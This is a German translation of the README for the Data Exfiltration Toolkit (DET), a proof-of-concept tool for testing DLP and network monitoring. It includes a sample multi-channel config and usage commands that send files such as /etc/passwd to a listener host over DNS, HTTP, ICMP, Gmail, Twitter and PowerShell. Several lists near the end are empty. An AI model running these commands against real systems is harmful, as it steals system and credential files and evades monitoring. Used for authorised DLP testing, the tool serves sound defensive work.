
(erweiterbar) Data Exfiltration Toolkit (DET)
DET (wird AS IS bereitgestellt) ist ein Proof of Concept zur Durchführung von Data Exfiltration unter Verwendung von entweder einem oder mehreren Kanälen gleichzeitig.
Dies ist ein Proof of Concept, das darauf abzielt, mögliche DLP-Fehler zu identifizieren. Dies sollte niemals verwendet werden, um sensible/aktuelle Daten zu exfiltrieren (etwa bei einer Bewertung).
Die Idee war, ein generisches Toolkit zu erstellen, um jede Art von Protokoll/Dienst einzustecken, um die Konfiguration implementierter Netzwerküberwachungs- und Data Leakage Prevention (DLP)-Lösungen gegen verschiedene Datenexfiltrationstechniken zu testen.
Das primäre Repository wurde nun hierher verschoben.
DET wurde auf der BSides Ljubljana am 9. März 2016 vorgestellt und die Folien werden hier verfügbar sein. Folien sind hier verfügbar.
Repository klonen:
git clone https://github.com/sensepost/DET.git
Dann:
pip install -r requirements.txt --user
Um DET zu verwenden, müssen Sie es konfigurieren und Ihre eigenen Einstellungen hinzufügen (z.B. SMTP/IMAP, AES256-Verschlüsselungspassphrase usw.). Eine Beispielkonfigurationsdatei wurde bereitgestellt und heißt: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
Um jedes Plugin zu laden:
python det.py -L -c ./config.json
Um nur die Twitter- und Gmail-Module zu laden:
python det.py -L -c ./config.json -p twitter,gmail
Um jedes Plugin zu laden und DNS auszuschließen:
python det.py -L -c ./config.json -e dns
Um jedes Plugin zu laden:
python det.py -c ./config.json -f /etc/passwd
Um nur die Twitter- und Gmail-Module zu laden:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
Um jedes Plugin zu laden und DNS auszuschließen:
python det.py -c ./config.json -e dns -f /etc/passwd
Und in PowerShell (HTTP-Modul):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
Bisher unterstützt DET mehrere Protokolle, die hier aufgelistet sind:
Und andere "Dienste":
Bisher bin ich damit beschäftigt, neue Module zu implementieren, die fast versandbereit sind, darunter:
Einige ziemlich coole Referenzen/Credits an Leute, von deren Projekten ich inspiriert wurde:
Sie können mich auf Twitter @PaulWebSec erreichen. Fühlen Sie sich frei, beizutragen, zu klonen, zu forken, Ihre PRs einzureichen usw.
DET ist unter einer MIT-Lizenz lizenziert. Berechtigungen über den Umfang dieser Lizenz hinaus können unter [email protected] verfügbar sein.